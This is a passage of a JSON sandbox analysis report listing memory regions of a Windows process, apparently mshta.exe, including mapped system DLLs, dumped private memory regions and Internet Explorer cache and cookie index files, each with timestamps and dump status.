"version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_465", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_466", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000467-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_467", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:26.017", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000468-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, 
"id": "region_468", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:26.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_469", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:26.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000470-addr_0x00000000013f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 20905984, "type": "region", "version": 1 }, "end_va": 21954559, "entry_point": 0, "filename": null, "id": "region_470", "name": "private_0x00000000013f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20905984, "timestamp": "00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_471", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 
1937702912, "timestamp": "00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000472-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_472", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:26.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_473", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:00:26.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_474", "name": "pagefile_0x0000000000200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2097152, "timestamp": "00:00:26.311", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000003-region_00000475-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_475", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:26.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2605055, "entry_point": 2228224, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_476", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 2228224, "timestamp": "00:00:26.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_478", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:26.518", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000479-addr_0x0000000000220000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", 
"writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_479", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:26.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 19595264, "type": "region", "version": 1 }, "end_va": 20508671, "entry_point": 0, "filename": null, "id": "region_480", "name": "pagefile_0x00000000012b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19595264, "timestamp": "00:00:26.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_481", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:26.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 21954560, "type": "region", "version": 1 }, "end_va": 24899583, "entry_point": 21954560, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": 
"region_482", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 21954560, "timestamp": "00:00:26.548", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2523135, "entry_point": 2490368, "filename": "\\Windows\\System32\\en-US\\urlmon.dll.mui", "id": "region_483", "name": "urlmon.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\urlmon.dll.mui", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:00:26.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_484", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:00:26.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_485", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:26.556", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_486", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:00:26.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 2686976, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_487", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:00:26.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2760703, "entry_point": 0, "filename": null, "id": "region_488", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:26.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, 
"filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_489", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:26.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2891775, "entry_point": 0, "filename": null, "id": "region_491", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:26.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_492", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:00:26.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_493", "name": 
"pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:00:26.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_494", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:26.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_495", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:26.677", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_496", "name": "pagefile_0x00000000002e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3014656, "timestamp": "00:00:26.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because 
region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_497", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:26.681", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000498-addr_0x00000000002f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 3080192, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_498", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:00:26.687", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000499-addr_0x0000000000300000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3178495, "entry_point": 3145728, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_499", "name": "index.dat", 
"norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:00:26.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000500-addr_0x00000000004e0000-size_0x000000000000c000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 49152, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5160959, "entry_point": 5111808, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_500", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 5111808, "timestamp": "00:00:26.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_501", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:00:26.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, 
"filename": "\\Windows\\System32\\nsi.dll", "id": "region_502", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:26.798", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000503-addr_0x00000000004f0000-size_0x0000000000050000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:26.801", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1956577280, "type": "region", "version": 1 }, "end_va": 1956855807, "entry_point": 1956577280, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_504", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1956577280, "timestamp": "00:00:26.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000505-addr_0x00000000017c0000-size_0x0000000000230000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2293760, "start_va": 24903680, "type": "region", "version": 1 }, "end_va": 27197439, "entry_point": 0, "filename": 
null, "id": "region_505", "name": "private_0x00000000017c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24903680, "timestamp": "00:00:26.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1933312000, "type": "region", "version": 1 }, "end_va": 1933426687, "entry_point": 1933312000, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_506", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1933312000, "timestamp": "00:00:26.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933275135, "entry_point": 1933246464, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_507", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:00:26.964", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000508-addr_0x0000000001a30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 28508159, "entry_point": 0, "filename": null, "id": "region_508", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 
27459584, "timestamp": "00:00:27.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:27.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1922236416, "type": "region", "version": 1 }, "end_va": 1922572287, "entry_point": 1922236416, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_510", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1922236416, "timestamp": "00:00:27.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1922105344, "type": "region", "version": 1 }, "end_va": 1922191359, "entry_point": 1922105344, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_511", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1922105344, "timestamp": "00:00:27.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1937899520, "type": "region", "version": 1 }, "end_va": 1937952767, "entry_point": 1937899520, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_512", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1937899520, "timestamp": "00:00:27.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000513-addr_0x0000000001860000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26607615, "entry_point": 0, "filename": null, "id": "region_513", "name": "private_0x0000000001860000", "norm_filename": null, "region_type": "private_memory", "start_va": 25559040, "timestamp": "00:00:27.171", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000514-addr_0x00000000019b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26935296, "type": "region", "version": 1 }, "end_va": 27197439, "entry_point": 0, "filename": null, "id": "region_514", "name": "private_0x00000000019b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26935296, "timestamp": "00:00:27.171", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000003-region_00000515-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_515", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:27.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000516-addr_0x00000000004f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5181439, "entry_point": 0, "filename": null, "id": "region_516", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000517-addr_0x0000000000500000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_517", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, 
{ "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5181439, "entry_point": 0, "filename": null, "id": "region_518", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:00:27.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1915224064, "type": "region", "version": 1 }, "end_va": 1915248639, "entry_point": 1915224064, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_519", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1915224064, "timestamp": "00:00:27.176", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000520-addr_0x0000000001cd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 31260671, "entry_point": 0, "filename": null, "id": "region_520", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:00:27.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
